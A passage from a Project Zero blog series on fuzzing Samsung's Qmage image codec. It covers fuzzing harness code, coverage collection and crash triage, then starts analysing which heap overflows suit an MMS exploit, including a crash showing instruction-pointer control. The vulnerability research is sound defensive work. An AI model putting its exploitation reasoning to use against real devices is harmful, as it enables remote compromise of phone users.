The solution to this problem is to use allocators specialized for fuzzing, which typically incur a significant memory overhead, but can provide very precise detection of memory bugs at the very moment when they happen. On Windows, examples of such allocators are PageHeap in user-mode and Special Pool in the kernel. On Linux, for closed-source software, there is Electric Fence and of course projects like valgrind for improved bug detection, but my favorite tool for the job is AFL's libdislocator. It is a super lightweight (<300 lines) module that simply implements malloc and free as mmap and mprotect, placing each returned chunk precisely at the end of a mapped memory page. It is easily adjustable, works on x86/ARM, and can be used either as a preloaded .so library or linked statically into the harness.
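
The core trick is simple enough to sketch in a few lines. This illustrates the general idea rather than libdislocator's exact code; a real implementation also tracks chunk sizes for free(), enforces alignment and applies allocation limits:

#include <stdint.h>
#include <string.h>
#include <sys/mman.h>

void *GuardedAlloc(size_t size) {
  const size_t kPage = 4096;
  // Round the request up to whole pages and append one extra, inaccessible guard page.
  size_t total = ((size + kPage - 1) & ~(kPage - 1)) + kPage;
  uint8_t *base = (uint8_t *)mmap(nullptr, total, PROT_READ | PROT_WRITE,
                                  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (base == MAP_FAILED) return nullptr;
  mprotect(base + total - kPage, kPage, PROT_NONE);    // guard page at the end
  uint8_t *ptr = base + total - kPage - size;          // chunk placed flush against the guard
  memset(ptr, 0xCC, size);                             // poison fresh memory, like libdislocator
  return ptr;
}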

In my case, I linked it in statically and redirected allocator calls to it via the malloc_hook mechanism. On Android, enabling these hooks requires setting the LIBC_HOOKS_ENABLE environment variable, which lets us easily switch between libdislocator and jemalloc when needed. Thanks to being able to intercept the heap allocator interface, I could also implement the --log_malloc flag, to log all allocs and frees taking place in the process at runtime. This option proved invaluable to me later during exploit development, as it allowed me to better understand the allocation patterns and identify the crashes most suitable for exploitation.
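
Roughly, the hook installation follows the sketch below. The hook variables are bionic globals that only take effect when the process runs with LIBC_HOOKS_ENABLE=1; in this simplified version they merely log calls and forward to the original allocator, whereas the real harness routes them into libdislocator:

#include <stdio.h>
#include <stdlib.h>

// glibc-compatible hook globals exported by bionic when malloc hooks are enabled.
extern "C" void *(*__malloc_hook)(size_t bytes, const void *caller);
extern "C" void (*__free_hook)(void *mem, const void *caller);

static void *(*orig_malloc)(size_t, const void *);
static void (*orig_free)(void *, const void *);

static void *LoggingMalloc(size_t size, const void *caller) {
  void *ptr = orig_malloc(size, caller);
  fprintf(stderr, "[DEBUG] malloc(%10zu) = %p\n", size, ptr);
  return ptr;
}

static void LoggingFree(void *ptr, const void *caller) {
  fprintf(stderr, "[DEBUG] free(%p)\n", ptr);
  orig_free(ptr, caller);
}

void InstallMallocHooks() {
  orig_malloc = __malloc_hook;   // the default hooks dispatch to the underlying allocator
  orig_free = __free_hook;
  __malloc_hook = LoggingMalloc;
  __free_hook = LoggingFree;
}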

The entire fuzzing session ran with libdislocator enabled, and I believe that all identified crashes manifested real bugs in the code. At the same time, it is important to note that there are some differences between the custom and default system allocator, which may influence how easy it is to reproduce a libdislocator crash with jemalloc (also detailed in my original bug report in section "3.3. Libdislocator vs libc malloc"):
  • There is a hard 1 GB allocation limit enforced by libdislocator, which makes it easier to surface bugs related to memory pressure, but may also mask issues that require large allocations to succeed first.
  • libdislocator doesn't adhere to the same allocation alignment rules as jemalloc, meaning that it may return completely misaligned pointers (side note: it is therefore incompatible with software that uses the low pointer bits for tags). This may hide some small out-of-bounds memory accesses (1-7 bytes) on Android, if they happen to fall into the padding area. It's worth noting that the misalignment occurs only in qemu, which doesn't seem to enforce the address alignment requirement on atomic instructions such as LDXR. On Android itself, the harness does correctly align the chunks too, in order to prevent bogus SIGBUS signals being thrown.
  • libdislocator fills all new allocations with a 0xCC marker byte to improve detection of use of uninitialized memory. With jemalloc, the contents of each allocated chunk are not guaranteed to have any particular value. Controlling the bytes of a specific fresh allocation may be non-trivial or require the use of "heap massaging" techniques in practical attack scenarios.

With the custom allocator covered, we have arrived at the current form of the SkCodecFuzzer harness. It is time to look beyond it and see how we can achieve even more at the level of the qemu emulator.

Implementing a Qemu fork server

Earlier in the post, I showed how decoding a sample Qmage file with our loader under qemu takes around 380ms. A question arises, what part of it is the qemu start up time, and is there any room for optimization here? We can run a simple test and measure the run time of the loader without any arguments:

Error: missing required --input (-i) option

Usage: [LIBC_HOOKS_ENABLE=1] ./loader [OPTION]...

Required arguments:
[...]

real  0m0.360s
user  0m0.336s
sys   0m0.024s
~/SkCodecFuzzer/source$

It turns out that simply printing out some help and immediately exiting takes 95% of the time it takes to decode a bitmap, indicating that there is a large constant cost of starting the process, which we can try to eliminate or at least significantly reduce. There is a well known solution to this problem called fork server, and the internal Google fuzzing infrastructure supports it, including the ability to resume execution from a user-defined forkserver_main function.

Of course in this case, enabling the fork server is not as easy as flipping a configuration flag, because that would only accelerate the qemu process startup time (already quite short at 10ms). However, the bulk of the overhead (~350ms in our testing so far) comes from bootstrapping the emulated environment before the target main function is reached:

Harness execution timeline in the qemu environment

Therefore, we have to get the fork server to fork inside qemu at the point when the emulation reaches the "loader" program entrypoint (at the border of the yellow and green sections). Fortunately, we don't have to figure it all out on our own, as AFL already supports such a mechanism. To make it work with qemu-4.1.1 (the version I was using), I had to modify the code in two places:

  1. In the load_elf_image function in linux-user/elfload.c, to find the entry point of the loader executable, similarly to how afl_entry_point is initialized in AFL's patch.
  2. In the cpu_tb_exec function in accel/tcg/cpu-exec.c, to detect when the emulation has reached the entry point and to call into the special forkserver_main routine to activate the fork server, similarly to how the AFL_QEMU_CPU_SNIPPET2 macro executes in AFL's patch.
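
For reference, the AFL-style fork server loop invoked at that point follows a simple pipe protocol. The sketch below is a simplified approximation (the real forkserver_main wiring and its error handling are more involved), using AFL's conventional control/status pipe descriptors:

#include <sys/wait.h>
#include <unistd.h>

#define FORKSRV_FD 198   // control pipe; FORKSRV_FD + 1 is the status pipe (AFL convention)

void forkserver_main(void) {
  unsigned int msg = 0;
  if (write(FORKSRV_FD + 1, &msg, 4) != 4) return;   // no fuzzer attached, run normally
  for (;;) {
    if (read(FORKSRV_FD, &msg, 4) != 4) _exit(1);    // wait for a "run one input" request
    pid_t child = fork();                            // fork the fully bootstrapped process
    if (child == 0) {
      close(FORKSRV_FD);
      close(FORKSRV_FD + 1);
      return;                                        // the child resumes emulation at the entry point
    }
    write(FORKSRV_FD + 1, &child, 4);                // report the child pid
    int status = 0;
    waitpid(child, &status, 0);                      // wait for it to exit or crash
    write(FORKSRV_FD + 1, &status, 4);               // report the exit status
  }
}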

These two relatively simple modifications were sufficient to cause a dramatic boost of fuzzing performance. Let's look at the numbers from the servers I actually ran the fuzzing on. They're a bit slower than my workstation, so without the fork server, the loader takes on average 1160ms to decode a sample from my corpus. With the fork server, this is reduced to 56ms, which makes it a ~20.5x speed up! And it gets even better when we enable the code coverage collection (discussed in next section) and specify the -d nochain command line flag: in that setting, the average decoding times grow to 6900ms (without fork server) and 147ms (with fork server) respectively, which further widens the gap between them to a factor of ~47x. In fuzzing, the importance of such small yet crucial optimization tricks simply cannot be overstated.

Extracting code coverage – introducing QemuSanitizerCoverage

Another hugely important part of automated software testing is collecting and acting on the code coverage triggered by mutated samples. The fuzzer that I used supports reading .sancov coverage information files generated by the SanitizerCoverage instrumentation. Since the harness already pretends to be an ASAN-enabled target, why not become a SanCov-compatible one too? This is exactly the purpose of the DrSancov project, but it is based on DynamoRIO and thus can only be used with software compatible with the host CPU architecture. So, I had to "port" DrSancov to qemu, creating a mod dubbed QemuSanitizerCoverage.

I began working on the port by looking for a location in the code where the information about each executed basic block passed through. I quickly found the -d exec option (and this helpful blog post), which could be used to print out the kind of data I was interested in, but in textual form. I traced it back to the following snippet:

149:    qemu_log_mask_and_addr(CPU_LOG_EXEC, itb->pc,
150:                           "Trace %d: %p ["
151:                           TARGET_FMT_lx "/" TARGET_FMT_lx "/%#x] %s\n",
152:                           cpu->cpu_index, itb->tc.ptr,
153:                           itb->cs_base, itb->pc, itb->flags,
154:                           lookup_symbol(itb->pc));

The above code resides in the familiar cpu_tb_exec function in accel/tcg/cpu-exec.c, which I had already modified to enable the fork server. In here, I only had to add a simple call to my sancov_log_trace() callback, passing itb->pc as the only argument. The actual work happens in the callback itself: if the instruction address resides in a known library, the corresponding cell in its coverage bitmap is marked as visited; if not, the /proc/pid/maps file is parsed to find the shared object or executable. Then, right before qemu exits, the collected coverage is dumped to disk. This is how it looks in practice:

$ ASAN_OPTIONS=coverage=1 LD_LIBRARY_PATH=`pwd`/lib64 ./qemu-aarch64 -d nochain ./loader accessibility_light_easy_off.qmg 
[+] Detected image characteristics:
[+] Dimensions:      344 x 344
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
[+] codec->GetAndroidPixels() completed successfully
QemuSanitizerCoverage: ./libhwui.so.1253370.sancov: 1502 PCs written
QemuSanitizerCoverage: ./libz.so.1253370.sancov: 333 PCs written
$

We get an output message similar to the one typically printed by SanitizerCoverage, which informs us that the processing of the sample Qmage file involved 1502 unique basic blocks in libhwui.so. We can take a peek at the coverage data:

$ xxd -e -g 4 libhwui.so.1253370.sancov | head -n 5
00000000: ffffff32 c0bfffff 00000d38 000010a4  2.......8.......
00000010: 000010ac 000010b0 000010b4 000010b8  ................
00000020: 000010c4 000010d8 000010e0 000011a4  ................
00000030: 000011a8 000011c0 000011cc 00001204  ................
00000040: 0006fa94 0006fac4 0006fad0 0006fadc  ................
$

There is an 8-byte header indicating the 32-bit format, followed by offsets of basic blocks relative to the start of the .text section in libhwui.so. We can convert the file to a format supported e.g. by Lighthouse and visualize the coverage or use the information directly to maintain an optimal corpus throughout the fuzzing session:

Qmage function control flow graph used for code coverage visualization
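
Producing the .sancov file itself is trivial once the per-module bitmaps are collected. A minimal sketch of the dump step (with a hypothetical WriteSancov helper, matching the 8-byte header plus 32-bit offsets layout shown above) could be:

#include <stdint.h>
#include <stdio.h>
#include <vector>

// Writes visited basic block offsets in the SanitizerCoverage .sancov format:
// an 8-byte magic marking 32-bit entries, followed by the offsets themselves.
void WriteSancov(const char *path, const std::vector<uint32_t> &offsets) {
  const uint64_t kMagic32 = 0xC0BFFFFFFFFFFF32ULL;
  FILE *f = fopen(path, "wb");
  if (f == nullptr) return;
  fwrite(&kMagic32, sizeof(kMagic32), 1, f);
  fwrite(offsets.data(), sizeof(uint32_t), offsets.size(), f);
  fclose(f);
}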

The benefits of having insight into the code coverage of a fuzzing target are well known, but I will emphasize that this feature played a key role in this project. It helped me fill in any gaps in my original input corpus, and get some degree of confidence that this highly extensive codec was tested thoroughly.

Initial file corpus

In my preparation for the first fuzzing attempt of the codec from Samsung Galaxy A50 (Android 9), there were three formats that I needed to find for my corpus: QMv1, QG1.0 and QG1.1. I was able to locate and extract a number of test cases encoded in each of them from the resources of built-in APKs in various Samsung firmwares from the 2014-2016 period, which I deemed sufficient to get myself started. Once I collected the initial data set, I ran a number of test fuzzing sessions during which the corpus continuously evolved thanks to the code coverage feedback. After a few days, it looked nothing like the original set of files: new samples were added, and most initial files were either removed or significantly mutated in the process. I was especially happy to see that a great majority of the files in the resulting corpus were minimized down to 20-50 bytes, which I attribute to the corpus management algorithm which favors shorter samples over longer ones (as described in my BH EU 2016 talk, slides 49-70).

When I learned about the existence of the new QG2.0 format in Android 10, I immediately went looking for such bitmaps in the usual place – embedded APK resources. To my surprise, I didn't find any images encoded in the new format then, and I still haven't seen any such files "in the wild" to date. This meant that I had to improvise. One of my attempts to create samples resembling the QG2.0 format was to take the existing ones in my corpus and hardcode the version in their headers to 2.0. This didn't work out very well as most such files were immediately crashing the codec (instead of hitting some deeper code paths), and I was left with only a few dozen artificial QG2.0 samples that probably didn't have very good coverage. I decided to leave the rest to the fuzzer and hope that over time, it would manage to synthesize much more interesting inputs in the new format.

I was not disappointed. Based on my measurements, after several days of fuzzing, the coverage of the QG2.0-related code paths was comparably good to the coverage of the three older formats. I will go into more detail on the numbers in a later section, but I think it is interesting to note that my December 2019 fuzzing session of the ≤ QG1.1 formats touched 18268 basic blocks in libhwui.so, while my January 2020 session of all ≤ QG2.0 formats had a coverage of 29081 blocks in the same library (and the coverage rate relative to the size of the Qmage codec was similar in both cases, at ~90%). This is a 59% increase, and it goes to show the extent of extra complexity added by Samsung in Android 10. It also seems in line with the size of the Qmage-related code in libhwui.so (mentioned in Part 1), which was 425 kB in Android 9, and 908 kB in Android 10.

As a last thought, I find it amusing how the fuzzer managed to reach the QG2.0 code paths, considering that this latest format introduces a one-byte checksum, which is verified against the file length in QmageDecCommon_ParseHeader:

if (input_data[header_size - 1] != xored_bytes_of_file_length) {
  __android_log_print(ANDROID_LOG_ERROR, "QG",
                      "QmageDecCommon_ParseHeader : checksum is different!");
  return -2;
}
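
Assuming the checksum is simply the XOR of the bytes of the 32-bit file length (as the pseudocode above suggests), it is easy to see why a 257-byte file passes the check:

#include <stdint.h>

uint8_t LengthChecksum(uint32_t file_length) {
  uint8_t checksum = 0;
  for (int i = 0; i < 4; i++) {
    checksum ^= (file_length >> (8 * i)) & 0xff;   // XOR all four length bytes together
  }
  return checksum;
}

// LengthChecksum(257): 0x01 ^ 0x01 ^ 0x00 ^ 0x00 == 0x00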

Even with this minor obstruction, the fuzzer managed to produce some samples that passed the check (most notably with a length of 257 bytes, which resolves to a 0x00 checksum). At the same time, the post-fuzzing corpus also contained plenty of QG1.2 files, which had me wondering for a long time, because I knew for a fact that this version didn't exist. When I finally decided to analyze this odd behavior, everything became clear. We have already discussed in Part 1 that the version check in QmageDecCommon_VersionCheck is very permissive and allows anything ≤ 2.0, so 1.2 passes just fine. But why this specific version? In the SkQmgCodec class, there is a field that denotes the version of the image: 0 for 1.0, 1 for 1.1 and 2 for 2.0. The way it used to be initialized (it seems to be fixed now) was as follows:

  • If version == 2.0, then internal_version = 2
  • Else if version == X.Y, then internal_version = Y

So according to this logic, QG1.2 files were equivalent to QG2.0 for all intents and purposes, except that they were easier to synthesize due to the lack of checksum verification, which is the reason so many of them wound up in my fuzzer's dynamic corpus. I probably wouldn't have come up with it myself given the non-trivial data flow in the header parsing, and it never ceases to amaze me how basic mutations paired with a coverage feedback loop can lead to such unexpected and clever results.

Mutation settings

The mutation settings I used for the fuzzing were very simple and involved five algorithms: flipping bits, randomly changing bytes, inserting "special" integers, performing arithmetic operations on the data, and cutting+pasting random continuous chunks across the input data stream. I also chained pairs of these mutators together, and occasionally invoked Radamsa. The mutation ratios ranged from 0% to 0.1%.
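
As an illustration (these are not the fuzzer's actual implementations), two of the simpler mutators could look like this:

#include <algorithm>
#include <cstdint>
#include <cstdlib>
#include <vector>

// Overwrite a ratio-dependent number of random bytes with random values.
void MutateRandomBytes(std::vector<uint8_t> &data, double ratio) {
  if (data.empty()) return;
  size_t count = std::max<size_t>(1, (size_t)(data.size() * ratio));
  for (size_t i = 0; i < count; i++) {
    data[rand() % data.size()] = rand() & 0xff;
  }
}

// Cut a random continuous chunk and paste it over another location in the sample.
void MutateCutPaste(std::vector<uint8_t> &data) {
  if (data.size() < 2) return;
  size_t len = 1 + rand() % (data.size() / 2);
  size_t src = rand() % (data.size() - len + 1);
  size_t dst = rand() % (data.size() - len + 1);
  std::vector<uint8_t> chunk(data.begin() + src, data.begin() + src + len);
  std::copy(chunk.begin(), chunk.end(), data.begin() + dst);
}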

Results

In this section, I discuss the results of the "final" fuzzing session I ran in January 2020, which uncovered the bugs reported to Samsung in Project Zero Issue #2002.

Code coverage

In the case of Qmage, it is difficult to precisely measure the percentage coverage of code relative to the overall size of the codec, because it is just one of many parts of the libhwui.so library, and even the codec itself contains unused and non-reachable code segments that shouldn't be included in the calculations. One way to address this problem is to only count functions with non-zero coverage, assuming that there probably aren't any significant routines completely missed by the corpus. By this metric, I achieved an 87.30% coverage of the Qmage codec. Most importantly, the "heavy" functions responsible for the complex data decoding and decompression are very well covered, with all of them having a coverage rate of >60%, and a great majority being at >80%. The chart below presents the coverage percentage of 34 Qmage functions longer than 4 kB. In total, they sum up to 26670 basic blocks, 23069 of which are covered (86.50%).

Qmage per-function code coverage

On one hand, these rates can be considered a success, but on the other, it may also indicate that 13% of bugs in the code never had a chance to be triggered and are still waiting to be uncovered. That is unless Samsung and/or Quramsoft have since started doing variant analysis or fuzzing of their own, which is easier and more effective with source code access.

Crashes

Counting both the Android 9 fuzzing session and the subsequent Android 10 session, the fuzzer ran for about four weeks between December 2019 and January 2020. During this time, it identified 5218 unique crashes, where the uniqueness was defined by the three top-level stack trace entries. This number is surely bloated by some bugs which trigger with different call stacks, but still, by any standard, this is a huge number of ways to crash a library. I find it likely that the Qmage codec had never been subject to fuzzing or a manual audit before, and the prevalent lack of bound checks may even suggest that the codec was never supposed to be exposed to untrusted inputs.

Thanks to the detailed ASAN-like reports accompanying the crashes, it was easy to perform some automated triage and classify them based on the signal type, accessed address, and the instruction causing the exception. I assigned each crash to one of the following categories, sorted by descending severity:

Category      Count    Percentage
write           174         3.33%
read-memcpy     124         2.38%
read-vector      18         0.34%
read-32           3         0.06%
read-16          52         1.00%
read-8           34         0.65%
read-4          703        13.47%
read-2          393         7.53%
read-1         3322        63.66%
sigabrt           3         0.06%
null-deref      392         7.51%
The categorization is highly simplified, but it does give some overview of the types of discovered issues. The "write" crashes are the most severe, because they manifest an attempt to write data to an invalid non-zero address, which is evidence of a memory corruption condition. They are followed by invalid reads of ≥ 8 bytes and crashes in generic memory manipulation functions (memcpy), which may indicate attempts to load pointers from invalid locations, or other problems related to the handling of structures or continuous data blobs. Next we have small invalid reads (1, 2 or 4 bytes), which generally manifest simple out-of-bounds reads of the input buffer, and then "sigabrt" (memory exhaustion and likely non-exploitable stack corruption) and "null-deref" (reads or writes to near-zero addresses), both of which are relatively trivial security threats beyond some DoS attacks.

That said, assessing bugs based on their first invalid memory access is not always reliable. For example, a one-byte overread may be directly followed by a buffer overflow, or a four-byte invalid access may manifest a use-after-free condition, which is much more serious than any random out-of-bounds buffer read. And even correctly interpreting the crash reports was no trivial feat; as I noticed shortly after reporting Issue #2002, some crashes were incorrectly classified as "null-deref" even though they were caused by attempted reads of completely invalid, non-canonical addresses. The reason is that when such a wild address is accessed, the siginfo_t.si_addr field received by the signal handler doesn't accurately reflect that address, and instead contains 0x0. This made the ASAN reports look like NULL pointer dereferences and confused my triage script. The solution was to re-analyze the reports by cross-referencing si_addr with the value of the source register, and an update shown in comment #1 was sent to Samsung on the next day.

What we can infer from the summary with some certainty is that upwards of 95% of the crashes were not critical, but they were an indictment of the overall quality of the code. Specifically, the fact that there were so many "read-1" issues shows that most of the parsing in the codec is implemented at a one-byte granularity, and that there were few to no bounds checks while reading from the input stream (until May 2020). In absolute numbers, however, the quantity of memory corruption bugs behind that 3.33% was still horrendous in my opinion, and it offered a wide selection of options for successful exploitation.

As a last exercise, we can take a peek at the crash counts divided by the Qmage format version:

Qmage codec crashes by format version

We can see that a large number of bugs were found in the oldest QMv1 format, however it is not as useful in attacks as the rest, because it is not correctly supported in all contexts on Android. What I find most interesting here is the rising trend in the number of crashes between QG1.0, 1.1 and 2.0, likely correlated with the growing complexity of the codec. In particular, the latest QG2.0 format introduced in Android 10 added as many issues as there had been in 1.0 + 1.1 altogether! And while there was no shortage of vulnerabilities even in Android 9, the new attack surface certainly worked in my favor as a researcher looking to exploit the codec. I'll get ahead of myself and admit that I did use a flaw in the QG2.0 format in my final MMS exploit, which will be discussed in later parts of this series.

What's next?

At this point of the story, it was the beginning of February and I had just reported the crashes to Samsung. I knew that Qmage was a zero-click attack surface reachable through MMS. What's more, I ran some of the samples from the "write" category through the Gallery and My Files apps, to see if any of them would trigger any promising faults. After a few tests, I stumbled upon the following crash in logcat:

*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'samsung/d2sxx/d2s:10/QP1A.190711.020/N975FXXS1BSLD:user/release-keys'
Revision: '24'
ABI: 'arm64'
Timestamp: 2020-01-24 09:40:57+0100
pid: 31355, tid: 31386, name: thumbnail_threa  >>> com.sec.android.app.myfiles <<<
uid: 10088
signal 7 (SIGBUS), code 1 (BUS_ADRALN), fault addr 0x4a4a4a4a4a4a4a
    x0  0000006ff55dc408  x1  0000006f968eb324  x2  0000000000000001  x3  0000000000000001
    x4  4a4a4a4a4a4a4a4a  x5  0000006f968eb31d  x6  00000000000000b3  x7  00000000000000b3
    x8  0000000000000000  x9  0000000000000001  x10 0000000000000001  x11 0000000000000001
    x12 0000007090d96860  x13 0000000000000001  x14 0000000000000004  x15 0000000000000002
    x16 0000007091463000  x17 0000007090ea2d94  x18 0000006f95d1a000  x19 0000006ff5709800
    x20 00000000ffffffff  x21 0000006ff55dc408  x22 00000000000000b0  x23 0000006f968ed020
    x24 0000000000000001  x25 0000000000000001  x26 0000006f968ed020  x27 0000000000000be5
    x28 0000000000012e9a  x29 0000006f968eb370
    sp  0000006f968eb310  lr  0000007090f5f7f0  pc  004a4a4a4a4a4a4a

backtrace:
      #00 pc 004a4a4a4a4a4a4a  <unknown>
      #01 pc 00000000002e97ec  /system/lib64/libhwui.so (process_run_dec_check_buffer+92) (BuildId: fcab350692b134df9e8756643e9b06a0)
      #02 pc 00000000002ddb94  /system/lib64/libhwui.so (QmageRunLengthDecodeCheckBuffer_Rev11454_141008+1320) (BuildId: fcab350692b134df9e8756643e9b06a0)
[...]

The file explorer crashed while trying to execute code from an invalid 0x4a4a4a4a4a4a4a address, which was almost conclusive evidence that the vulnerability could be exploited to execute arbitrary code. This gave me an extra motivational boost to try to write an MMS exploit for a Samsung flagship phone with the then-latest firmware build. As someone relatively new to the Android ecosystem, it was a great opportunity for me to get better acquainted with the system's security model, existing mitigations, and the current state of the art of exploitation. In Project Zero, we often take part in such offensive exercises to put ourselves in the attacker's shoes. Our vulnerability research and exploitation development work leads to structural security improvements, and better drives our and the wider security community's defense efforts.

I had been previously able to find answers to most of my questions regarding the history and inner workings of Qmage, but trying to exploit it generated a completely new set of doubts and challenges I had to face. Some of them were familiar to me as a security engineer, but others seemed completely new:

  • Which bug(s) provided the most powerful primitives, while also being relatively easy to understand and work with?
  • What objects in memory could be reliably overwritten, and how could they be used to achieve anything useful?
  • How to remotely bypass Android ASLR in a constrained MMS environment which mostly works as a one-way communication channel?
  • How to keep the Messages app up and running despite triggering repeated crashes?

It took me a few months of experimentation and trial and error to arrive at satisfactory solutions to these problems. In the end, I managed to get all of the moving parts to work together well enough to construct the interaction-less attack. In an attempt to give some structure to the somewhat chaotic process I went through, my next blog post will focus on finding the optimal heap corruption primitive to act as the foundation of any higher-level mechanisms employed by the exploit.

MMS Exploit Part 3: Constructing the Memory Corruption Primitives

28 July 2020 at 19:50
By: Tim
Posted by Mateusz Jurczyk, Project Zero

This post is the third of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.

Introduction

In Part 2, I discussed how I managed to fuzz-test the Qmage codec on Google infrastructure at the turn of 2019/2020. It led to the discovery of a huge number of unique crashes, many of which manifested obvious memory corruption problems. After reporting them to Samsung on 28 January 2020, my attention turned to the idea of using some of the vulnerabilities to write an MMS exploit. There was evidence that the Samsung Messages app processed incoming bitmaps without any user interaction, so this seemed like the perfect opportunity to see just how realistic such an attack could be with a wide range of image parsing bugs to choose from. The prospect of developing a zero-click exploit running over the mobile network was new and thrilling to me, and it got me very excited to take the challenge.

The first step in the process was to identify the crashes that were not just high severity on paper, but were also the most convenient for exploitation in a real-life scenario. An ideal bug would be easy to work with (i.e. require a relatively simple structure of the Qmage file), and would provide full control over the memory corruption condition. In case of a heap buffer overflow, this would imply control over the allocation size, overflow size, overflow data, and possibly even the overflow offset (in a non-linear case). Such a bug would lay a strong foundation for any higher-order mechanisms that would have to be implemented in the exploit.

This blog post describes the additional crash triage I performed to find the most suitable bug for exploitation, followed by an analysis of how it was used to turn plain memory corruption into more useful primitives: control over the instruction pointer (PC), and the ability to "probe" the existence of memory ranges. In practice, I was simultaneously experimenting with the MMS protocol to get an initial feel of its design, capabilities and limitations. However, for the sake of clarity, I will limit the scope of this write-up to the low level exploitation details, and proceed to link the memory corruption with the MMS delivery channel in future posts. Let's get started!

Heap fundamentals in Android

The first observation to make is that a great majority of the identified crashes were heap-oriented. There were some instances of stack buffer overflows, but the stack cookie mitigation rendered them non-exploitable. There were also other cases such as reads from uninitialized stack-based pointers, but they didn't seem particularly useful, so in the end, I decided to focus on the 174 "write" crashes, all of which referenced out-of-bounds heap addresses. In principle, such bugs tend to provide the most flexibility in exploitation, as they can be used to corrupt a variety of objects in memory. So, if we are going to work with the Android heap, we should get familiar with the underlying allocator and its security properties.

The allocator currently used in all modern versions of Android is jemalloc (side note: this is going to change with the introduction of Scudo in Android 11). There were two main resources that I found especially useful when learning and experimenting with jemalloc:

  • "The Shadow over Android: Heap exploitation assistance for Android’s libc allocator" at INFILTRATE 2017 (slides) and the shadow exploitation framework itself (GitHub).
  • "A Tale of Two Mallocs: On Android libc Allocators" at INFILTRATE 2018 (video), and the accompanying blog post series (specifically part 2).

I won't go into much detail regarding the internals of the allocator (you can find them in the above sources), but I would like to highlight the following properties that are most relevant to this research:

  • Determinism: jemalloc behaves deterministically, at least to the extent observable by the attacker. For example, with a clean state of the heap, two subsequent allocations of the same size are positioned next to each other.
  • Lack of inline metadata: metadata is stored separately from the allocation itself, so an overflow of one chunk (or "region", as it's called in jemalloc) immediately overwrites the data of the adjacent one, with no metadata in between.
  • Division into size classes: allocations are grouped by size, so any two allocations can only be adjacent to each other if they fall into the same size "bin".
  • Thread caches: a mechanism called "tcaches" improves locality by quickly reusing recently freed regions. This guarantees the predictability of some allocation patterns – for example, a malloc → free → malloc sequence of the same length will return the same address twice (see the short experiment after this list).
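
The determinism and thread-cache behavior are easy to observe in practice. A trivial experiment along the lines of the snippet below, run against Android's jemalloc, typically prints two adjacent addresses for the same-size regions, and then the freed address being handed out again:

#include <cstdio>
#include <cstdlib>

int main() {
  void *a = malloc(160);
  void *b = malloc(160);           // on a quiescent heap, usually placed right after 'a'
  printf("a=%p b=%p\n", a, b);
  free(a);
  void *c = malloc(160);           // the thread cache hands the freed region straight back
  printf("c=%p (expected to equal a)\n", c);
  return 0;
}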

These characteristics can be favorable or disadvantageous depending on the specific bug and context around it. Overall, in this case, I think these properties added up to a "net positive" from the attacker's perspective, which is not great for user security. For this reason, I am really looking forward to seeing the hardened Scudo allocator enabled by default in Android 11.

Now that we have some background on the behavior we can expect from jemalloc, it's time to analyze the write-violation crashes in search of the most promising ones.

Finding the right bug

With all that we know about jemalloc, we can make a working assumption that if there are two malloc calls, and they can be made to be of a similar size, the second one can be corrupted by the first one with a forward overflow, because it is (usually) placed at a higher address. So in order to assess the usability of a crash, we need to determine:

  • What region is overwritten by the bug?
  • What are the other allocations that are requested between the overwritten allocation and the overflow, and are used after the overflow?

The SkCodecFuzzer test harness has an -l flag that enables the logging of all mallocs and frees to stderr at runtime. It can be used to match the address of the invalid memory access with the corresponding allocation, and see what other allocations are made in between. For example, if we take the signal_sigsegv_40064924d0_4336_c77562cdc52d1baed45ff05bc9ae2023.qmg sample and run it through the loader with the -l flag, we should see the following output (malloc stack traces were edited out for brevity):

[...]
[+] Detected image characteristics:
[+] Dimensions:      148 x 192
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
[DEBUG] malloc(    113664) = {0x408c0ff400 .. 0x408c11b000}
[DEBUG] malloc(       104) = {0x408c11cf98 .. 0x408c11d000}
[DEBUG] malloc(     28416) = {0x408c11e100 .. 0x408c125000}
[DEBUG] malloc(        22) = {0x408c126fea .. 0x408c127000}
[DEBUG] malloc(      4120) = {0x408c128fe8 .. 0x408c12a000}
ASAN:SIGSEGV
=================================================================
==212100==ERROR: AddressSanitizer: SEGV on unknown address 0x408c125000 (pc 0x400396c4d0 sp 0x4000d04c90 bp 0x4000d04c90 T0)
    #0 0x002b54d0 in libhwui.so (QuramQmageGrayIndexRleDecode+0xdc)
    #1 0x0029d584 in libhwui.so (__QM_WCodec_decode+0xa3c)
    #2 0x0029c9b4 in libhwui.so (Qmage_WDecodeFrame_Low_Rev14474_20150224+0x144)
    #3 0x0029ae7c in libhwui.so (QuramQmageDecodeFrame_Rev14474_20150224+0xa8)
[...]

Here, the invalid 0x408c125000 address is the same as the end of the third allocation requested after printing out the image characteristics. Its size of 28416 bytes coincides with 148 (width) × 192 (height), so we can presume that it is a pixel storage buffer and therefore has controlled length. There are two more allocations (highlighted in red) made after the overflown buffer and kept alive until the crash, so each of them could be the target of the memory corruption. In the call stack, we can also see that the problem occurs during RLE decoding, which is a well-known algorithm and thus would probably meet our criteria of being easy to work with. This is how a specific crash can be evaluated for exploitability.

Since I wished to explore the whole range of options and manually performing the same analysis on the other 173 unique "write" crashes seemed tedious, I wrote a quick bash script to generate and process the crash logs to match the invalid accessed addresses with corresponding heap regions. After sorting and deduplicating, they added up to a total of 23 unique overwritten allocation sites. I was not particularly interested in QMv1 crashes (the old format wasn't correctly handled by the Messages application), so I filtered them out from the results, leaving me with 17 allocations subject to overflow. That was a much more manageable number of cases to go through by hand.

After a brief analysis, I concluded that many of them were not optimal for my exploit, because they were temporary buffers, allocated and immediately overflown without any mallocs taking place in between. Taking advantage of such a bug would require an earlier allocation to be mapped above the buffer – a heap state that is possible, but harder to reliably achieve with the limited heap manipulation capabilities of the image codec. The remaining allocation sites that had some potential could be divided into four major groups:

Option 1: The pixel storage buffer associated with the Bitmap object, which is the #1 malloc made by the harness after parsing the headers
  • Example crash ID: e9e773f3e0a6d155636a52a5418d9160
  • Size: Controlled through the bitmap dimensions
  • Allocated in: SkBitmap::tryAllocPixels
  • Overflown by: QuramQumageDecoder8bit, QuramQumageDecoder32bit24bit, QuramQmageGrayIndexRleDecode, qme_inflate_fast (via PVcodecDecoder_zip)
  • Potential corruption targets: The android::Bitmap object allocated directly after, and any further allocation made by the specific codec (depending on which one is used to trigger the overflow)

